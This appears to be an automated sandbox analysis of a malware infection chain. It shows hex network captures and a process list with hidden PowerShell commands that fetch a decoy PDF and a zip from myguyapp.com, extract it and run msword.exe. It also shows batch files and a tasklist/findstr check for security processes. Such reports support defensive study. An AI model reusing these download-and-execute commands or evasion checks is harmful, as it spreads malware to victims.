2025-01-07 21:33:00 UTC	16384	IN	Data Raw: 1a fd 5a 3e 03 f8 6e f9 d5 fd 03 3a bf fd e8 f7 c1 eb 99 9f 4d c9 cf 54 dd f8 8f 6e 99 f3 bb 81 1f 17 fc ec 8b fd 67 9d df c9 cc 4f ff e5 cc ef 90 16 52 e6 fc 4e 6e 7c bc 7c c1 ff f7 3b ee f7 dc 7d ef a3 5f 36 f3 3b 39 9d f3 cb e6 fd ae e0 17 1e c9 33 82 83 1f 4d 74 67 7e d3 91 5f c3 b7 8c fd 9a 3b fc 76 64 f9 77 de cf 7d e7 be f1 c1 cf 96 33 bf 7c e4 47 cb 1f e5 9c 5f bb db 7e c3 f4 37 fa fd 33 de fc c8 7e 4b f3 7f 9d 9f 2e e3 fc 5f eb 3f 76 7e 7f c5 eb f0 bb e9 07 3f 11 f9 55 99 77 bb e6 67 69 40 ab c8 8f bf 27 3f 3d 9b ff b3 61 fe cf 94 9d 9f f6 d1 ef 26 fa 69 f6 fb d8 fb 7d 64 3f 47 7e 36 ac 4f 7c 72 3d 7e f9 83 fc e8 f7 4d 1f f2 33 45 f4 d3 55 ef 57 f8 78 99 97 df aa 9b e0 47 ef df df c8 6f 17 d6 9f 0e cb bf 2e e3 1d 82 d2 b0 37 c1 2a bf b8 fc 56 d8 Data Ascii: Z>n:MTngORNn\|\|;}_6;93Mtg~_;vdw}3\|G_~73~K._?v~?Uwgi@'?=a&i}d?G~6O\|r=~M3EUWxGo.7*V
2025-01-07 21:33:00 UTC	16384	IN	Data Raw: c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 1d da 6f 70 8a f6 6d 33 d2 1d da 2f 1d 98 08 bb 61 46 ba 83 fa 39 85 d6 07 b9 5f e2 b4 e7 bf bf 65 46 ba 83 fa 45 ed 61 d7 1a 7f e5 f6 d4 e1 05 33 d2 1d d4 2f 69 2f f6 5a cb bf c5 f6 17 f8 f8 3d d8 f5 06 9e 36 e8 97 77 58 bf 87 ad cf e9 97 77 58 bf f6 3b 4e d0 2f 8f 7e 58 87 f5 6b 3f 0d d3 2f 8f 7e 58 87 f4 cb e8 d7 df a1 fc b2 d3 b2 f6 3c 93 ea c7 ea 17 07 a6 16 d2 ef 60 d7 3b 57 4c bc c4 89 9d cc 8f 75 5b 44 fd 6a 9e 71 fc 46 32 d2 5b Data Ascii: E?,a~XE?,a~XE?,a~XE?,a~XE?,a~XE?,aopm3/aF9_eFEa3/i/Z=6wXwX;N/~Xk?/~X<`;WLu[DjqF2[
2025-01-07 21:33:00 UTC	12375	IN	Data Raw: c3 cc 9c e0 0e ee 37 3d 78 51 6c b6 7b 3e db ee ff 62 35 ff fa 7d f9 30 35 27 b8 83 fb f9 83 17 d1 cf 1c c2 2f 0b 06 2f 8a fb 1e b3 1b fd 5f ac e6 5f d7 41 9b 98 13 dc 81 fd d2 c1 d5 17 13 87 bd cb bc 21 7e 21 fd 3a 55 f6 2a c4 41 af df c0 73 6d 35 ff ba ae 73 c7 e6 04 77 60 3f 19 5f a9 6b 36 23 93 be 6b ca 26 3b 2d 2e b2 44 4c 7c 13 05 69 6c 6a 66 d1 24 9e b9 9f 6f a3 c4 81 f5 f3 4d e6 99 5a 18 19 53 34 27 b5 03 fb c9 ea 5f 5c 30 f5 72 18 17 32 27 d0 6f 13 2f 13 b9 a6 ec c5 b5 d0 09 1c 2f 2a 9a 37 5f 77 04 d9 d4 dc c4 f1 f5 eb 89 13 3a 7e d9 4d 4f ee 4e 9e 03 fb c9 ea 5f 23 32 45 27 58 69 a4 67 fd 0d 79 50 26 32 aa 96 2a c6 73 6b e5 9b 67 df 73 bc fa 62 fa c6 97 8a fa 90 f5 2a d6 af 28 9b cd 37 df f3 1c 37 89 43 73 42 3b b0 9f 3c 13 ac c4 37 5f bb 1e ac Data Ascii: 7=xQl{>b5}05'//__A!~!:UAsm5sw`?_k6#k&;-.DL\|iljf$oMZS4'_\0r2'o//7_w:~MON_#2E'XigyP&2skgsb(77CsB;<7_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	193.26.115.39	443	7696	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 21:33:04 UTC	167	OUT	GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2025-01-07 21:33:04 UTC	285	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 21:33:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 07 Jan 2025 20:10:56 GMT ETag: "1437bf-62b2357c8a5c2" Accept-Ranges: bytes Content-Length: 1324991 Connection: close Content-Type: application/zip
2025-01-07 21:33:04 UTC	7907	IN	Data Raw: 50 4b 03 04 14 00 08 00 08 00 30 61 27 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 20 00 6d 73 77 6f 72 64 2e 65 78 65 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 55 54 0d 00 07 fd 89 7d 67 4a 8a 7d 67 37 8a 7d 67 ec bd 7b 7c 54 c5 f9 3f 7e f6 92 64 49 36 ec 22 09 46 0d 1a 21 28 ca a5 d1 05 4d 5c d0 05 72 42 b0 59 5c 58 77 17 94 70 51 12 0f 2b 02 4d ce e1 d2 12 25 6e a2 ac 87 b5 d6 da 8f da da 4f 4d b1 ad 6d 6d a5 ad 95 a8 88 09 20 09 4a 2d 0a c5 b4 e0 c7 80 54 cf ba 51 57 89 61 81 c8 f9 be 9f 99 b3 21 f0 b1 b7 ef eb fb fb ef 17 5e b3 67 ce 9c b9 3c f3 cc 73 9b 99 67 06 ef 6d 8f 08 16 41 10 ac 08 ba 2e 08 ad 02 ff f3 08 ff fa 6f 1f c2 d0 cb 5e 1e 2a bc 30 e4 4f 97 b7 9a aa fe 74 f9 ad d2 b2 fa a2 55 75 2b ef aa 5b 72 4f d1 9d 4b 56 ac 58 29 17 dd 51 53 Data Ascii: PK0a'Z msword.exeuxUT}gJ}g7}g{\|T?~dI6"F!(M\rBY\XwpQ+M%nOMmm J-TQWa!^g<sgmA.o^*0OtUu+[rOKVX)QS
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: f9 cf 6d a0 8d 32 26 b3 94 62 49 bf 0c 43 a1 e7 3f 4b 28 1f 8b 46 fd 9a 0e 3a d2 5a 0c 99 f6 24 f3 48 01 f9 70 0b 17 1a 2d 4f f3 80 04 a3 18 30 80 dc 50 36 81 08 5a 5e 18 08 69 cf 8e 22 f0 12 17 a2 9f 85 ac 9f df fb 2a 0d 7d 56 e4 53 b3 fb 44 fd df 69 98 49 50 b9 4f d4 ad 60 f3 6d 32 d4 b5 8f c6 b3 15 f3 6b 0c 80 ef 1c 43 9b cf cc 5d 64 1e a2 20 09 67 24 f7 39 12 83 da dd 97 92 6d 81 b6 0b b5 4b d0 2d 6d e3 57 b4 95 ba 8b 2c 43 e4 72 34 7d 42 d0 d2 e6 1f 83 f3 77 97 d3 7c 43 cf 7f 86 fa 66 63 7d 1b 8d 0a b9 7c f4 a7 77 65 e5 97 02 7e ce 27 7e ee 96 52 5b 36 81 e0 50 72 0c 78 f6 17 33 9f b9 42 ee 19 f0 7a 31 f9 62 10 85 d9 56 e1 f5 45 bc 86 2f 5e b4 5d 83 fc 61 3e 86 fa 96 22 12 c2 da 93 e3 b9 df 47 23 87 4d be 29 6c 0a 4a 24 d8 f5 fc a7 b9 2f c8 84 40 50 Data Ascii: m2&bIC?K(F:Z$Hp-O0P6Z^i"*}VSDiIPO`m2kC]d g$9mK-mW,Cr4}Bw\|Cfc}\|we~'~R[6Prx3Bz1bVE/^]a>"G#M)lJ$/@P
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: f3 fb 51 e7 2a ff 87 dd c2 67 36 da bd 1e 95 e5 91 03 d4 66 48 96 32 86 4f 5d 9f bf 1f 6e 7d ea 5f a3 32 8a f1 50 0b 9f f8 98 bf 33 1f dc 9f bf 40 bf ba fb 4c e3 70 c0 60 e1 70 75 3c 52 a4 7d 4c 57 f4 86 c5 26 3f 37 b7 c0 f6 e8 62 15 92 d5 96 f4 76 fa 4e 04 97 7a c8 f5 ea d1 cc 0c 06 f1 f8 d5 09 f9 97 1d dd af 07 5b 89 7b 51 8d 63 bc cf ec f7 1f 3e d3 fa f6 65 e0 1a 73 60 aa 94 f8 9e d6 10 b1 00 d9 d2 c3 fe cb f7 2d 4d 5e 98 15 f2 e1 ea 21 cf 45 ae 4c 44 0e 76 42 de 09 55 0b 38 ac 0e d5 57 d3 93 eb 93 9f 2d 9d 3c d6 70 82 2a 8d e2 16 b6 d4 be 58 79 72 79 bd aa 7a b7 8a f7 00 73 62 31 31 9c 9b 78 ed e8 ed a5 67 ba 2e ee f7 a4 f6 f6 21 81 12 2a c0 d0 b8 91 ad 4f 9f ba 6a 0d bd b8 38 fa b8 f3 69 28 ca 41 f9 c7 d7 8d 0f fc e9 fa 04 51 53 c4 6b 57 ee 36 6e 86 Data Ascii: Qg6fH2O]n}_2P3@Lp`pu<R}LW&?7bvNz[{Qc>es`-M^!ELDvBU8W-<pXyryzsb11xg.!*Oj8i(AQSkW6n
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: cd 33 1a 8c e0 b0 bb 43 53 30 19 3f dd e0 c3 5a f3 21 ed 64 21 ee 27 db 02 5a e0 e6 98 1b 70 d9 59 7f a2 51 f1 c3 4c 3d d7 c0 a6 d3 c7 50 e5 6d 9b ac 8a 4b b5 2d 04 ae 39 79 5f 0e 08 66 b8 16 39 b6 ff 51 60 6b 74 0f ae 43 1e 57 91 3d 39 87 21 a8 bb c5 3e 79 10 d6 7c 7c c3 69 11 fd 47 19 f4 38 1c 66 8e bd ec 68 fd 5b da 22 15 2c ee db 1d 19 f9 1c 14 9f 36 0f 79 76 86 5f cc 3b f8 75 18 de 4a 56 d8 db cf 0d 15 b8 89 13 cc e2 08 3f fe 96 3e c8 a1 41 ff 31 3e 3e 6a 6f c2 21 bc 8b ee 0d 1c 7a 9e 98 ef df 24 08 45 6d 8f 14 b9 77 51 78 4d aa 0f 1d 85 8e db 4f 99 72 c2 fa 62 56 6a ff 9e 10 5e a6 2f 97 bd 86 78 b4 9e a3 52 f6 cd c2 c9 31 ad b9 5f fe 4b eb d7 cc 09 21 52 13 37 54 a8 25 4d 3e be 25 4b 47 83 40 c0 66 2a d9 ef 0d b0 10 b2 1d 83 b4 cc 4b 07 0e c9 32 69 Data Ascii: 3CS0?Z!d!'ZpYQL=PmK-9y_f9Q`ktCW=9!>y\|\|iG8fh[",6yv_;uJV?>A1>>jo!z$EmwQxMOrbVj^/xR1_K!R7T%M>%KG@f*K2i
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: 8f ef b7 e5 ea cb 68 bb 7c fd d1 22 15 17 95 69 f3 96 25 c1 95 f1 a4 a0 6f f4 ea 4f df e2 af 15 b7 86 1e d4 1f 45 d5 f2 9c e0 9e 90 5e 8d 6c 9d 7e 9e 1d 5f fa f9 54 77 99 a8 7e dd dc 68 d9 4b 25 fe e6 66 59 8e 81 1b 61 ac 29 5a 71 6b bc 3f a3 c4 5e 5a 6b ae e3 6d db 32 33 f9 31 29 38 b9 ef 1d 7a 83 3d fc 0b 1d c8 d3 a3 fb 16 c6 36 33 71 2e f5 05 17 8f 7c 58 10 f6 b3 ff b1 c3 b1 23 b5 50 7b f3 0e 87 b5 cc 03 f2 81 e3 72 2f 3e eb 92 ee 5b d4 fa 85 af 70 b0 90 52 52 58 6f ce 37 96 b1 de 69 dc f2 9f 1f b8 c8 a4 9f cc 46 92 ab 51 5a bb c9 c8 cb 31 df d1 4e 64 26 09 9f 96 37 7d cb ae 92 ac 7c aa 60 65 e1 a3 61 6b 1e ea 93 dd bb a7 2f 25 b9 f9 5e 89 71 5b c5 16 45 f2 cd b1 58 61 79 c9 6a d5 89 b6 77 ee 6a ea e9 be 7d fd a5 b8 e4 34 e3 af d0 20 9a 76 49 ac 9e 81 Data Ascii: h\|"i%oOE^l~_Tw~hK%fYa)Zqk?^Zkm231)8z=63q.\|X#P{r/>[pRRXo7iFQZ1Nd&7}\|`eak/%^q[EXayjwj}4 vI
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: 79 e2 fd f6 9e ac ab af 0f aa 01 31 11 46 fe 10 14 ef de d0 f1 0c b8 8d 75 14 bd 50 7e 58 d6 dc 97 68 f7 f4 46 69 48 21 55 31 c7 d8 1f 42 e5 b5 c7 71 9d 8d f4 c6 ae d9 8d 36 aa ab 07 62 da a0 f0 24 95 e1 74 e0 c7 fc 90 f0 cd cf 5b f7 1e 32 aa 4c 1b eb 79 83 92 7b 17 41 77 3c 30 62 54 ed 59 11 ba e7 c8 27 e5 ac a1 e8 04 d9 2b ca 6a ef 78 41 71 ea e0 cf 5e 23 1c f5 d2 18 0e 2c ac 80 1e ca 20 fc e2 47 95 b0 1a c6 bf 2a f4 d5 8e 8a 8e a3 3b 28 19 a4 ae 7a 94 98 d2 cf 62 b3 2d 91 18 9a 3f 16 03 7a 83 60 46 bb d3 ab 1e 80 5b 86 d6 ef 0b c4 e3 2a f1 49 fd 50 8e 54 71 6f 00 89 d7 d9 b2 b5 ad f5 6f 7d 3d cd 8c dd 16 50 7a 1e 92 36 85 d3 0d 46 09 e6 68 88 20 d5 1c 7b 60 66 d5 f7 a8 1a f7 9b 5b 90 5f cb 5b 8f 19 b1 fa fa a8 4f aa 4c a9 ca 3e f4 d7 c9 2a 75 66 c7 fb Data Ascii: y1FuP~XhFiH!U1Bq6b$t[2Ly{Aw<0bTY'+jxAq^#, G;(zb-?z`F[IPTqoo}=Pz6Fh {`f[_[OL>*uf
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: b4 29 1a f7 aa 56 a2 a2 51 ce ff d6 c5 24 81 2e 07 5e 15 e5 22 c8 f1 b1 16 b6 04 a4 9e 4d 26 a1 a6 41 cc 6b 47 10 07 aa 89 28 4d ff 38 8e 7c e8 77 d3 4b 50 cf e0 20 d5 7a 2b 2c b9 9d 05 2b b3 9a 79 61 eb 9e fb 0e ef 33 c2 c3 9e a0 bb d8 ba 7c 6d db 22 1f f6 c8 3c 15 bc 9d ae 24 5c 02 92 5a 0f 1e 2d 74 52 b4 fd 1f 71 b8 db 44 89 31 a9 65 1d 0f b7 c7 88 d6 69 6b 96 91 8c c9 1a b1 9b b5 38 b2 1f 78 8c ad fe 61 45 5f d0 5b b8 9f 54 e6 4a 26 e8 b9 0d 0d 2b 61 11 44 07 a0 d9 02 fa 71 e4 21 1c b9 2a f0 a3 f3 f2 cd 71 48 df 2c 87 f6 cc 3e f9 4b 09 63 c3 66 d1 0b b2 27 fd 52 95 90 ff 5b 9f 24 eb b3 f7 22 3c 52 af 26 de 86 1f 3f 43 de 4e d5 cf 47 fe b3 f2 95 bd 4a a6 45 01 96 01 a3 9f 5c c5 9a cc f4 43 71 95 9e 0c 43 e3 db 41 b0 e7 ad d4 42 62 8a 16 43 a6 44 dd 17 Data Ascii: )VQ$.^"M&AkG(M8\|wKP z+,+ya3\|m"<$\Z-tRqD1eik8xaE_[TJ&+aDq!*qH,>Kcf'R[$"<R&?CNGJE\CqCABbCD
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: c4 04 bf 6f 36 89 51 f7 00 8a de a4 7c 4c ce 51 2b 3c 6a 6e 65 fc ba 41 17 27 71 f4 cc 50 ba 65 43 a0 ff f4 7a 06 9b ea 11 26 98 d9 5d c1 a5 5e c4 1f 46 6a af 21 3d 11 7b 15 05 55 cc bf 18 81 a0 85 6f a6 c8 5d 2b ae 35 5a 23 5b 0c 8a bc c1 6c 42 ce ba 26 89 94 bc 15 53 c2 d7 20 b2 ca b9 af 7a 8e d0 9a 2e 0f b2 67 f7 92 cb 67 72 f3 6a 02 6a 77 7b 0c df 29 1b a0 bd cb 6b 7f d3 0a 4d 9c d4 c9 7b 85 38 b4 95 f5 da 5c bf 83 48 2d 29 62 66 2d 7b 87 70 4d 89 f5 cf d7 15 e5 2c e7 87 05 f8 f4 d6 bf 80 f3 7e 61 60 ae 7b 55 68 8f d8 ae 43 eb 3f e7 68 c4 7a cb 50 61 19 18 90 25 8e 47 72 f4 78 10 2c 7d 94 28 95 0e 9b 65 db c9 eb 6b 11 31 1b 22 03 e0 20 a1 6b 16 a8 3b af bd 39 5f 42 0e 76 f4 3b 82 bc ec 65 66 d9 58 10 41 dc ff b3 35 50 44 6e 22 6f 74 ad 51 c2 bd 14 19 Data Ascii: o6Q\|LQ+<jneA'qPeCz&]^Fj!={Uo]+5Z#[lB&S z.ggrjjw{)kM{8\H-)bf-{pM,~a`{UhC?hzPa%Grx,}(ek1" k;9_Bv;efXA5PDn"otQ
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: 0e 39 fb 56 a5 dc f4 08 07 62 a4 87 df fc ff 0f 1f 87 61 ac 6e 98 31 45 a7 17 35 46 86 c2 eb 5d 87 0c a0 ab 62 2f 77 24 07 ed 5e f5 23 bd 32 42 ae be df 26 49 23 ef 41 28 32 0b 80 59 4a 24 87 32 0b bc 81 2a 5e 7a 92 7c 02 27 f0 57 10 84 8c 04 65 18 d4 34 2c 99 da 67 b7 90 5e 83 0d 11 e9 dc 97 6b b5 da 43 7c 38 d5 cd 72 b2 b1 bd 62 22 bb 04 5b c5 a9 62 10 39 ef 69 ab 7d b1 49 47 58 8c e7 7f 0f 3a 02 52 30 6a 10 8e fa 36 3d 12 3b 1b 10 a1 fe 8e 1b 6f 58 f0 59 68 0a 8b b1 33 8f 4f 5f bd 5c f5 7c 88 55 8f 75 da 77 d2 8e 9d 03 f9 af 59 7d ff ca 52 5b cd 84 41 72 19 71 05 2a 63 db c1 9b f1 b3 64 f2 c7 18 75 4d f3 3a 1d d9 5a 34 8a af bc 79 da 4a d6 38 cb a7 eb c2 5c bd a8 1c b2 7a 47 1f 53 09 d2 b8 ae 81 0f db 5c ca 59 4f eb 1c 1f 91 33 e6 11 47 37 82 7e 04 b4 Data Ascii: 9Vban1E5F]b/w$^#2B&I#A(2YJ$2^z\|'We4,g^kC\|8rb"[b9i}IGX:R0j6=;oXYh3O_\\|UuwY}R[ArqcduM:Z4yJ8\zGS\YO3G7~
2025-01-07 21:33:04 UTC	16384	IN	Data Raw: 27 a8 b6 81 1f a4 29 7f db 5f 73 5d 71 e1 0c 58 bd 02 48 ce ec d9 05 a6 75 a8 5f f6 e4 fc 3a 3e 66 e7 6e ed cd 7e 08 7f 67 fc 69 38 95 a7 b3 c3 f6 10 10 9c 5c c4 53 df 65 c9 a7 7f 3d ff 56 1a 38 f0 43 f2 9a 49 21 fc b6 0e b5 fb 70 10 a0 0d 94 7a 73 cf a6 f9 1e b7 1a d4 60 8b 25 b6 84 c4 d1 46 dd 60 05 70 d0 22 d8 16 4f aa 86 ed 3a 79 cb 50 d7 7b c6 ac 42 e8 d9 1c b0 97 8a a8 b9 31 aa 55 4b 6b 02 0d 24 45 c2 4e e0 4c 2f b6 7b 33 20 db 91 13 74 e8 97 78 85 40 6a 79 ba ea 7f 35 16 15 68 d5 c9 55 c9 6d 5f de 2a 0a 3a 7b e5 08 d6 e8 8a 17 3c 57 9a 85 66 20 51 e9 00 40 4b 82 45 9e a0 d4 5c 8f 1c ff 1d a1 9e 03 1f a2 92 5d cf e3 7b d5 a3 f2 e2 27 9c 9b 3a 5e cd f7 84 d0 d3 f8 1c 54 a2 5e 1f 96 14 3c 50 5a f3 2d 13 da bb e6 92 61 af e5 f0 65 96 dd be 60 93 cb 58 Data Ascii: ')_s]qXHu_:>fn~gi8\Se=V8CI!pzs`%F`p"O:yP{B1UKk$ENL/{3 tx@jy5hUm_*:{<Wf Q@KE\]{':^T^<PZ-ae`X

Target ID:	0
Start time:	16:32:55
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase:	0xce0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:32:56
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:32:56
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:32:57
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x710000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:32:59
Start date:	07/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	16:32:59
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase:	0x710000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:33:01
Start date:	07/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	16:33:01
Start date:	07/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1720,i,5858866170035192879,1714130894212185246,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	16:33:07
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase:	0x710000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:33:10
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	msword.exe
Imagebase:	0x400000
File size:	1'352'687 bytes
MD5 hash:	90B82696A0A9DE2974B4BD90C61EC6ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:33:10
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:33:11
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:33:12
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x960000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:33:12
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:33:12
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:33:15
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x330000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:33:15
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:33:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x330000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:33:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
